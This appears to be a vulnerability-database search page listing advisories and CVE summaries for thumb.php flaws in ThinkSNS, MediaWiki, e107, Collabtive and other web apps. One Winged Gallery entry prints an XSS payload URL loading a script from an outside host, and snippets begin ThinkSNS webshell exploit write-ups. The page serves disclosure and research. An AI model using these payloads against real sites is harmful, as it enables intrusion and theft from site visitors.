76 matches found

myhack58
added 2013/02/01 12:0 a.m., 20 views

ThinkSNS 2.8 file upload exploit exp - vulnerability warning - the black bar safety net

Affected version: the latest 2.8 stable release; other versions were not tested. Vulnerable file: thumb.php. Author: Wei kunpeng. 1. Prepare the following PHP file and upload it to the server yourself. File content as follows: <?php echo "...

AI score 0.2
Exploits: 0

UbuntuCve
added 2012/11/26 11:55 p.m., 32 views

CVE-2010-5284

Multiple cross-site scripting (XSS) vulnerabilities in Collabtive 0.6.5 allow remote attackers to inject arbitrary web script or HTML via the (1) User parameter in the edit user profile feature to manageuser.php, (2) y parameter in a newcal action to manageajax.php, and the (3) pic parameter to thumb.php...

CVSS 4.3, AI score 5.9, EPSS 0.08472
Exploits: 1, References: 5

Cvelist
added 2012/11/26 11:0 p.m., 25 views

CVE-2010-5284

Multiple cross-site scripting (XSS) vulnerabilities in Collabtive 0.6.5 allow remote attackers to inject arbitrary web script or HTML via the (1) User parameter in the edit user profile feature to manageuser.php, (2) y parameter in a newcal action to manageajax.php, and the (3) pic parameter to thumb.php...

AI score 5.7, EPSS 0.08472
Exploits: 1, References: 5

seebug.org
added 2012/09/29 12:0 a.m., 8 views

ThinkSNS 2.5 thumb.php file upload vulnerability

No description provided by source...

AI score 7.1
Exploits: 0

myhack58
added 2012/07/25 12:0 a.m., 14 views

ThinkSNS 2.5 exp to obtain a webshell - vulnerability warning - the black bar safety net

Problem file: thumb.php. Code analysis: <?php /* automatic thumbnail; parameters: url|w|h|type="cut/full"|mark="text/image|r"; thumb.php?url=/thinksns/data/userface/000/00/00/41middleface.jpg?1247718988&w=20&h=20 */ error_reporting(0); set_time_limit(30); $biggestmemorylimit = 256...

AI score 6.9
Exploits: 0

NVD
added 2012/01/04 7:55 p.m., 20 views

CVE-2011-4920

Multiple cross-site scripting (XSS) vulnerabilities in e107 0.7.26, and other versions before 1.0.0, allow remote attackers to inject arbitrary web script or HTML via the URL to (1) e107_images/thumb.php or (2) rate.php, (3) resend_name parameter to e107_admin/users.php, and (4) link BBCode in user signatures...

CVSS 4.3, AI score 5.8, EPSS 0.00503
Exploits: 0, References: 8

UbuntuCve
added 2010/03/31 6:0 p.m., 28 views

CVE-2010-1190

thumb.php in MediaWiki before 1.15.2, when used with access-restriction mechanisms such as img_auth.php, does not check user permissions before providing scaled images, which allows remote attackers to bypass intended access restrictions and read private images via unspecified manipulations...

CVSS 4.3, AI score 5.9, EPSS 0.00221
Exploits: 0, References: 2

NVD
added 2010/03/31 6:0 p.m., 14 views

CVE-2010-1190

thumb.php in MediaWiki before 1.15.2, when used with access-restriction mechanisms such as img_auth.php, does not check user permissions before providing scaled images, which allows remote attackers to bypass intended access restrictions and read private images via unspecified manipulations...

CVSS 4.3, AI score 6.5, EPSS 0.00221
Exploits: 0, References: 8

Cvelist
added 2010/03/31 5:35 p.m., 21 views

CVE-2010-1190

thumb.php in MediaWiki before 1.15.2, when used with access-restriction mechanisms such as img_auth.php, does not check user permissions before providing scaled images, which allows remote attackers to bypass intended access restrictions and read private images via unspecified manipulations...

AI score 6.4, EPSS 0.00221
Exploits: 0, References: 8

Cvelist
added 2009/10/02 7:0 p.m., 14 views

CVE-2009-3538

Directory traversal vulnerability in thumb.php in Clear Content 1.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the url parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information...

AI score 6.4, EPSS 0.00141
Exploits: 1, References: 2

Prion
added 2008/11/14 6:8 p.m., 17 views

SQL injection

Multiple SQL injection vulnerabilities in E-Uploader Pro 1.0 (aka Uploader PRO), when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1) id parameter to (a) img.php, (b) file.php, (c) mail.php, (d) thumb.php, (e) zip.php, and (f) zipit.php, and (2) the view parameter t...

CVSS 6.8, AI score 9.3, EPSS 0.00414
Exploits: 1, References: 4, Affected Software: 1

securityvulns
added 2006/06/27 12:0 a.m., 37 views

Winged Gallery v1.0

Winged Gallery v1.0 Homepage: http://winged.info/index.php?p=gallery XSS vuln on thumb.php: http://example.com/gallery/thumb.php?image=data/Example+Folder/firefox+icon.jpg"''"""SCRIPT20SRC=http://youfucktard.com/xss.js/SCRIPT"''''&size=75&type=2&w=128&h=128"''"""...

AI score 0.1
Exploits: 0

exploitpack
added 2006/06/24 12:0 a.m., 10 views

Winged Gallery 1.0 - Thumb.php Cross-Site Scripting

Winged Gallery 1.0 - Thumb.php Cross-Site Scripting source: https://www.securityfocus.com/bid/18629/info Winged Gallery is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue...

AI score 6.8
Exploits: 0

Cvelist
added 2005/11/22 11:0 p.m., 15 views

CVE-2005-3763

Exponent CMS 0.96.3 and later versions includes the full installation path in the base parameter to thumb.php, which allows remote attackers to obtain sensitive information. NOTE: this might be resultant from an absolute path traversal vulnerability...

AI score 6.5, EPSS 0.00424
Exploits: 0, References: 3

securityvulns
added 2005/06/22 12:0 a.m., 20 views

W-Nailer 0.34

I accidentally discovered, while looking for vulnerabilities on someone else's site, a vulnerability in W-Nailer 0.34. Developer: http://wnailer.vddh.com/ Vulnerability: in the file scripts/thumb.php, file is not checked; as a result, any file on the site can be viewed, something like a shell when viewing previews. Example:...

AI score 7.2
Exploits: 0

NVD
added 2004/12/31 5:0 a.m., 9 views

CVE-2004-1407

Multiple directory traversal vulnerabilities in singapore Image Gallery Web Application 0.9.10 allow remote attackers to (1) read arbitrary files via the showThumb method for thumb.php, or (2) delete arbitrary files via admin.class.php...

CVSS 5, AI score 7, EPSS 0.00484
Exploits: 0, References: 5